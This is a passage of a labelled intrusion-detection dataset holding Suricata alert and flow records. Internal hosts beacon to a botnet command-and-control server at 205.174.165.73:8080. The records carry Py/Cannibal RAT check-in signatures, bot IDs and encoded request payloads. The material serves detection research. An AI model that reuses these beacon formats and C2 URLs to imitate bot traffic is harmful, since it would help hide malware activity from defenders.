'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:15:27.856589+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobg5AAIAGTxLAqAoPza6lScv9H5BuU6Ie7T9fW1ARAQAoiQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,240,075
192.168.10.15-52222-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4200243, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:15:52
71,364
Friday
[{'timestamp': '2017-07-07T13:15:52.219165+0000', 'flow_id': 2161753836766142, 'pcap_cnt': 4200243, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52222, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:15:52.148414+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobhNAAIAGTw3AqAoPza6lScv+H5D0SNSdqkzV1FARAQA8jQAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:15:52.219165+0000', 'flow_id': 2161753836766142, 'pcap_cnt': 4200243, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52222, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:15:52.148414+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobhNAAIAGTw3AqAoPza6lScv+H5D0SNSdqkzV1FARAQA8jQAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,240,625
192.168.10.9-2353-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4211552, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:16:36
121,496
Friday
[{'timestamp': '2017-07-07T13:16:36.410526+0000', 'flow_id': 2023271209135171, 'pcap_cnt': 4211552, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2353, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:16:36.289859+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoHeJAAIAGn0TAqAoJza6lSQkxH5CcZnmEU/Y0c1ARAQCqFAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:16:36.410526+0000', 'flow_id': 2023271209135171, 'pcap_cnt': 4211552, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2353, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:16:36.289859+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoHeJAAIAGn0TAqAoJza6lSQkxH5CcZnmEU/Y0c1ARAQCqFAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,241,412
192.168.10.15-52223-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4224211, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:17:07
73,130
Friday
[{'timestamp': '2017-07-07T13:17:08.018420+0000', 'flow_id': 188856319307723, 'pcap_cnt': 4224211, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52223, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:17:07.946123+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobhhAAIAGTwjAqAoPza6lScv/H5BvBTDDArMhzlARAQDBSgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:17:08.018420+0000', 'flow_id': 188856319307723, 'pcap_cnt': 4224211, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52223, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:17:07.946123+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobhhAAIAGTwjAqAoPza6lScv/H5BvBTDDArMhzlARAQDBSgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,241,611
192.168.10.15-52224-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 495, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4270570, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:17:32
73,591
Friday
[{'timestamp': '2017-07-07T13:17:32.284676+0000', 'flow_id': 1310285166820261, 'pcap_cnt': 4270570, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52224, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:17:32.211877+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobh1AAIAGTwPAqAoPza6lScwAH5CuVilS0OPKmlARAQASbAAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:17:32.284676+0000', 'flow_id': 1310285166820261, 'pcap_cnt': 4270570, 'event_type': 'alert', 'src_ip': '192.168.10.15', 'src_port': 52224, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': '00:1e:4f:d4:ca:28', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc4&sysinfo=Windows%2010', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 435, 'bytes_toclient': 308, 'start': '2017-07-07T13:17:32.211877+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzQmc3lzaW5mbz1XaW5kb3dzJTIwMTAgSFRUUC8xLjENCkhvc3Q6IDIwNS4xNzQuMTY1LjczOjgwODANCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IHB5dGhvbi1yZXF1ZXN0cy8yLjE0LjINCg0K', 'payload_printable': 'GET /api/pop?botid=mitacs-pc4&sysinfo=Windows%2010 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxAB5P1MooCABFAAAobh1AAIAGTwPAqAoPza6lScwAH5CuVilS0OPKmlARAQASbAAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,241,982
192.168.10.9-2354-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 4278588, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:18:16
76,628
Friday
[{'timestamp': '2017-07-07T13:18:16.502769+0000', 'flow_id': 840205294142432, 'pcap_cnt': 4278588, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2354, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:18:16.426976+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAoIPBAAIAGnDbAqAoJza6lSQkyH5DwEwJB89oCX1ARAQBf2QAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:18:16.502769+0000', 'flow_id': 840205294142432, 'pcap_cnt': 4278588, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 2354, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:18:16.426976+0000'}, 'payload': 